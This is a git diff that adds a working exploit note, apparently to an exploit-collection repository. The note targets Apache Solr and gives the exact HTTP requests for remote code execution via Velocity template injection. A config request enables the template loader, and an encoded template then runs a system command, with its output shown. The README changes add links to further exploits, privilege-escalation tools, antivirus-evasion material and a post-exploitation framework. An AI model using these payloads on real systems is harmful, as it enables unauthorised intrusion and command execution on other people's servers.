diff --git a/Apache Solr RCE via Velocity Template Injection.md b/Apache Solr RCE via Velocity Template Injection.md new file mode 100644 index 0000000..d6cc403 --- /dev/null +++ b/Apache Solr RCE via Velocity Template Injection.md @@ -0,0 +1,44 @@ +``` +Apache Solr RCE via Velocity template + +Set "params.resource.loader.enabled" as true. + +Request: +======================================================================== +POST /solr/test/config HTTP/1.1 +Host: solr:8983 +Content-Type: application/json +Content-Length: 259 + +{ + "update-queryresponsewriter": { + "startup": "lazy", + "name": "velocity", + "class": "solr.VelocityResponseWriter", + "template.base.dir": "", + "solr.resource.loader.enabled": "true", + "params.resource.loader.enabled": "true" + } +} +======================================================================== + + +RCE via velocity template +Request: +======================================================================== +GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 +Host: localhost:8983 +======================================================================== + + +Response: +======================================================================== +HTTP/1.1 200 OK +Content-Type: text/html;charset=utf-8 +Content-Length: 56 + + 0 uid=8983(solr) gid=8983(solr) groups=8983(solr) +======================================================================== +``` + +> from : https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt \ No newline at end of file diff --git a/README.md b/README.md index ba104ff..8542e57 100644 --- a/README.md +++ b/README.md @@ -93,6 +93,12 @@ - [CVE-2019-12409_Apache_Solr RCE](https://github.com/jas502n/CVE-2019-12409) - [Shiro RCE (Padding Oracle Attack)](https://github.com/wuppp/shiro_rce_exp) - [CVE-2019-19634-class.upload.php <= 2.0.4任意文件上传](https://github.com/jra89/CVE-2019-19634) +- [Apache Solr RCE via Velocity Template Injection](./Apache%20Solr%20RCE%20via%20Velocity%20Template%20Injection.md) +- [CVE-2019-10758-mongo-express before 0.54.0 is vulnerable to Remote Code Execution ](https://github.com/masahiro331/CVE-2019-10758/) +- [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本)](https://github.com/marcinguy/CVE-2019-2107) +- [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/) +- [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817) +- ## 提权辅助相关 @@ -102,6 +108,7 @@ - [CVE-2019-0803 Win32k漏洞提权工具](./CVE-2019-0803) - [脏牛Linux提权漏洞](https://github.com/Brucetg/DirtyCow-EXP) - [远控免杀系列](https://github.com/TideSec/BypassAntiVirus) +- [Linux提权-CVE-2019-13272 A linux kernel Local Root Privilege Escalation vulnerability with PTRACE_TRACEME](https://github.com/jiayy/android_vuln_poc-exp/tree/master/EXP-CVE-2019-13272-aarch64) ## PC @@ -151,6 +158,7 @@ - [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack) - [SVN源代码泄露全版本Dump源码](https://github.com/admintony/svnExploit) - [多进程批量网站备份文件扫描](https://github.com/sry309/ihoneyBakFileScan) +- [Empire](https://github.com/BC-SECURITY/Empire/)|相关文章:[后渗透测试神器Empire详解](https://mp.weixin.qq.com/s/xCtkoIwVomx5f8hVSoGKpA) ## 书籍相关